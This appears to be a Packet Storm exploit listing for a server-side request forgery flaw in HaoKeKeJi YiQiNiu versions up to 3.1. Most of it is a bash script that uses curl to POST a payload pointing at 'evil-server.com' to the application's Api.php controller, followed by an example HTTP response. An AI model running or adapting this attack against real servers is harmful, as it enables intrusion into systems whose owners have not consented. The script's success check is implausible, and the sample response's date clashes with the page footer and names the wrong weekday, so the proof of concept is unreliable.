HaoKeKeJi YiQiNiu versions up to 3.1 suffer from a server-side request forgery vulnerability.
801b655eed6286d9fcfe47d883a75477216cba6d270053e5bc32cef9f76a18c8#!/bin/bash
# Set target URL and payload
target_url="http://example.com/application/pay/controller/Api.php"
payload="url=http://evil-server.com/exploit"
# Send the malicious request
response=$(curl -s -X POST -d "$payload" "$target_url")
# Check if the exploit was successful
if echo "$response" | grep -q "Exploit successful"; then
echo "Exploit succeeded"
else
echo "Exploit failed"
fi
# Example payload and response
payload="url=http://evil-server.com/exploit"
response="HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 01 Dec 2024 20:23:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 25
Connection: keep-alive
Exploit successful"
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed